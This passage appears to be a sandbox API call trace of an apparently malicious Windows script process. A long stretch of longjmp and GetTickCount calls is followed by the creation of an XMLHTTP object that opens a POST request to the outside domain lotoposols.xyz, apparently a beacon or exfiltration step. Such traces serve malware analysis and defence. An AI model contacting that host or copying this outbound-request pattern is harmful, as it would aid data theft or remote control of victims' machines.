	[0202.714] longjmp () 
	[0202.714] longjmp () 
	[0202.714] longjmp () 
	[0202.715] longjmp () 
	[0202.715] longjmp () 
	[0202.715] longjmp () 
	[0202.715] longjmp () 
	[0202.715] longjmp () 
	[0202.716] longjmp () 
	[0202.716] longjmp () 
	[0202.716] longjmp () 
	[0202.716] longjmp () 
	[0202.716] longjmp () 
	[0202.717] longjmp () 
	[0202.717] longjmp () 
	[0202.717] longjmp () 
	[0202.717] longjmp () 
	[0202.718] GetTickCount () returned 0x116821c
	[0202.718] longjmp () 
	[0202.718] longjmp () 
	[0202.718] longjmp () 
	[0202.718] longjmp () 
	[0202.719] longjmp () 
	[0202.719] longjmp () 
	[0202.719] longjmp () 
	[0202.719] longjmp () 
	[0202.719] longjmp () 
	[0202.720] longjmp () 
	[0202.720] longjmp () 
	[0202.720] longjmp () 
	[0202.720] longjmp () 
	[0202.720] longjmp () 
	[0202.721] longjmp () 
	[0202.721] longjmp () 
	[0202.721] longjmp () 
	[0202.721] longjmp () 
	[0202.721] longjmp () 
	[0202.722] longjmp () 
	[0202.722] longjmp () 
	[0202.722] longjmp () 
	[0202.722] longjmp () 
	[0202.722] longjmp () 
	[0202.723] longjmp () 
	[0202.723] longjmp () 
	[0202.723] longjmp () 
	[0202.723] longjmp () 
	[0202.724] longjmp () 
	[0202.724] longjmp () 
	[0202.724] longjmp () 
	[0202.724] longjmp () 
	[0202.725] GetTickCount () returned 0x116822b
	[0202.725] longjmp () 
	[0202.725] longjmp () 
	[0202.725] longjmp () 
	[0202.725] longjmp () 
	[0202.725] longjmp () 
	[0202.726] longjmp () 
	[0202.726] longjmp () 
	[0202.726] longjmp () 
	[0202.726] longjmp () 
	[0202.726] longjmp () 
	[0202.727] longjmp () 
	[0202.727] longjmp () 
	[0202.727] longjmp () 
	[0202.727] longjmp () 
	[0202.727] longjmp () 
	[0202.728] longjmp () 
	[0202.728] longjmp () 
	[0202.728] longjmp () 
	[0202.728] longjmp () 
	[0202.728] longjmp () 
	[0202.729] longjmp () 
	[0202.729] longjmp () 
	[0202.729] longjmp () 
	[0202.729] longjmp () 
	[0202.729] longjmp () 
	[0202.730] longjmp () 
	[0202.730] longjmp () 
	[0202.730] longjmp () 
	[0202.730] longjmp () 
	[0202.730] longjmp () 
	[0202.731] longjmp () 
	[0202.731] longjmp () 
	[0202.731] GetTickCount () returned 0x116822b
	[0202.731] longjmp () 
	[0202.731] longjmp () 
	[0202.731] longjmp () 
	[0202.732] longjmp () 
	[0202.732] longjmp () 
	[0202.732] longjmp () 
	[0202.732] longjmp () 
	[0202.732] longjmp () 
	[0202.733] longjmp () 
	[0202.733] longjmp () 
	[0202.733] longjmp () 
	[0202.733] longjmp () 
	[0202.734] longjmp () 
	[0202.734] longjmp () 
	[0202.734] longjmp () 
	[0202.734] longjmp () 
	[0202.734] longjmp () 
	[0202.735] longjmp () 
	[0202.735] longjmp () 
	[0202.735] longjmp () 
	[0202.735] longjmp () 
	[0202.735] longjmp () 
	[0202.735] longjmp () 
	[0202.736] longjmp () 
	[0202.736] longjmp () 
	[0202.736] longjmp () 
	[0202.736] longjmp () 
	[0202.736] longjmp () 
	[0202.737] longjmp () 
	[0202.737] longjmp () 
	[0202.737] longjmp () 
	[0202.737] longjmp () 
	[0202.737] GetTickCount () returned 0x116822b
	[0202.737] longjmp () 
	[0202.738] longjmp () 
	[0202.738] longjmp () 
	[0202.738] longjmp () 
	[0202.738] longjmp () 
	[0202.739] longjmp () 
	[0202.739] longjmp () 
	[0202.739] longjmp () 
	[0202.739] longjmp () 
	[0202.739] longjmp () 
	[0202.739] longjmp () 
	[0202.740] longjmp () 
	[0202.740] longjmp () 
	[0202.740] longjmp () 
	[0202.740] longjmp () 
	[0202.740] longjmp () 
	[0202.741] longjmp () 
	[0202.741] longjmp () 
	[0202.741] longjmp () 
	[0202.741] longjmp () 
	[0202.741] longjmp () 
	[0202.742] longjmp () 
	[0202.742] longjmp () 
	[0202.742] longjmp () 
	[0202.742] longjmp () 
	[0202.743] longjmp () 
	[0202.743] longjmp () 
	[0202.743] longjmp () 
	[0202.743] longjmp () 
	[0202.743] longjmp () 
	[0202.743] longjmp () 
	[0202.744] longjmp () 
	[0202.744] GetTickCount () returned 0x116823b
	[0202.744] longjmp () 
	[0202.744] longjmp () 
	[0202.744] longjmp () 
	[0202.744] longjmp () 
	[0202.745] longjmp () 
	[0202.745] longjmp () 
	[0202.745] longjmp () 
	[0202.745] longjmp () 
	[0202.746] longjmp () 
	[0202.746] longjmp () 
	[0202.746] longjmp () 
	[0202.746] longjmp () 
	[0202.746] longjmp () 
	[0202.747] longjmp () 
	[0202.747] longjmp () 
	[0202.747] longjmp () 
	[0202.748] longjmp () 
	[0202.748] longjmp () 
	[0202.749] longjmp () 
	[0202.749] longjmp () 
	[0202.749] longjmp () 
	[0202.749] longjmp () 
	[0202.749] longjmp () 
	[0202.750] longjmp () 
	[0202.750] longjmp () 
	[0202.750] longjmp () 
	[0202.750] longjmp () 
	[0202.750] longjmp () 
	[0202.751] longjmp () 
	[0202.751] longjmp () 
	[0202.751] longjmp () 
	[0202.751] longjmp () 
	[0202.751] GetTickCount () returned 0x116823b
	[0202.751] longjmp () 
	[0202.752] longjmp () 
	[0202.752] longjmp () 
	[0202.752] longjmp () 
	[0202.752] longjmp () 
	[0202.752] longjmp () 
	[0202.753] longjmp () 
	[0202.753] longjmp () 
	[0202.753] longjmp () 
	[0202.753] longjmp () 
	[0202.753] longjmp () 
	[0202.754] longjmp () 
	[0202.755] longjmp () 
	[0202.755] longjmp () 
	[0202.755] longjmp () 
	[0202.755] longjmp () 
	[0202.755] longjmp () 
	[0202.756] longjmp () 
	[0202.756] longjmp () 
	[0202.756] longjmp () 
	[0202.756] longjmp () 
	[0202.756] longjmp () 
	[0202.757] longjmp () 
	[0202.757] longjmp () 
	[0202.757] longjmp () 
	[0202.757] longjmp () 
	[0202.757] longjmp () 
	[0202.758] longjmp () 
	[0202.758] longjmp () 
	[0202.758] longjmp () 
	[0202.758] longjmp () 
	[0202.758] longjmp () 
	[0202.759] GetTickCount () returned 0x116824a
	[0202.759] longjmp () 
	[0202.759] longjmp () 
	[0202.759] longjmp () 
	[0202.759] longjmp () 
	[0202.760] longjmp () 
	[0202.760] longjmp () 
	[0202.760] longjmp () 
	[0202.760] longjmp () 
	[0202.760] longjmp () 
	[0202.761] longjmp () 
	[0202.761] longjmp () 
	[0202.761] longjmp () 
	[0202.761] longjmp () 
	[0202.762] longjmp () 
	[0202.762] longjmp () 
	[0202.762] longjmp () 
	[0202.762] longjmp () 
	[0202.762] longjmp () 
	[0202.763] longjmp () 
	[0202.763] longjmp () 
	[0202.763] longjmp () 
	[0202.763] longjmp () 
	[0202.763] longjmp () 
	[0202.764] longjmp () 
	[0202.764] longjmp () 
	[0202.764] longjmp () 
	[0202.764] longjmp () 
	[0202.764] longjmp () 
	[0202.765] longjmp () 
	[0202.765] longjmp () 
	[0202.765] longjmp () 
	[0202.765] longjmp () 
	[0202.766] GetTickCount () returned 0x116824a
	[0202.766] longjmp () 
	[0202.766] longjmp () 
	[0202.766] longjmp () 
	[0202.766] longjmp () 
	[0202.766] longjmp () 
	[0202.767] longjmp () 
	[0202.767] longjmp () 
	[0202.767] longjmp () 
	[0202.767] longjmp () 
	[0202.767] longjmp () 
	[0202.768] longjmp () 
	[0202.768] longjmp () 
	[0202.768] longjmp () 
	[0202.768] longjmp () 
	[0202.768] longjmp () 
	[0202.768] longjmp () 
	[0202.769] longjmp () 
	[0202.769] longjmp () 
	[0202.769] longjmp () 
	[0202.769] longjmp () 
	[0202.770] longjmp () 
	[0202.770] longjmp () 
	[0202.770] longjmp () 
	[0202.770] longjmp () 
	[0202.770] longjmp () 
	[0202.771] longjmp () 
	[0202.771] longjmp () 
	[0202.771] longjmp () 
	[0202.771] longjmp () 
	[0202.771] longjmp () 
	[0202.772] longjmp () 
	[0202.772] longjmp () 
	[0202.772] GetTickCount () returned 0x116825a
	[0202.772] longjmp () 
	[0202.772] longjmp () 
	[0202.772] longjmp () 
	[0202.772] longjmp () 
	[0202.773] longjmp () 
	[0202.773] longjmp () 
	[0202.773] longjmp () 
	[0202.773] longjmp () 
	[0202.774] longjmp () 
	[0202.774] longjmp () 
	[0202.774] longjmp () 
	[0202.774] longjmp () 
	[0202.774] longjmp () 
	[0202.774] longjmp () 
	[0202.775] longjmp () 
	[0202.775] longjmp () 
	[0202.775] longjmp () 
	[0202.775] longjmp () 
	[0202.775] longjmp () 
	[0202.775] longjmp () 
	[0202.776] longjmp () 
	[0202.776] longjmp () 
	[0202.776] longjmp () 
	[0202.776] longjmp () 
	[0202.778] longjmp () 
	[0202.778] longjmp () 
	[0202.778] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0202.779] SysStringLen (param_1=0x0) returned 0x0
	[0202.779] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0202.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0202.779] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0202.779] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0202.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5b88) returned 0x0
	[0202.779] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0202.779] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5b88, pUnkSite=0x3cacc0) returned 0x0
	[0202.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0202.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0202.779] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0202.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0202.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0202.780] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0202.780] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0202.780] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0202.780] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0202.780] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0202.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0202.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0202.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0202.780] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0202.780] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0202.780] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0202.780] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0202.780] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0202.781] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0202.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0202.781] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0202.781] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0202.781] XMLHTTPRequest:IUnknown:Release (This=0x47a5b88) returned 0x0
	[0202.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0202.781] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0202.781] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0202.781] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0202.781] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0202.781] GetTickCount () returned 0x116825a
	[0202.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0202.781] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0202.784] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0202.784] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0202.784] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0202.784] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0202.784] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0202.784] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0202.784] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0202.785] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0202.785] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0202.785] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0202.800] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0202.800] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0202.801] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
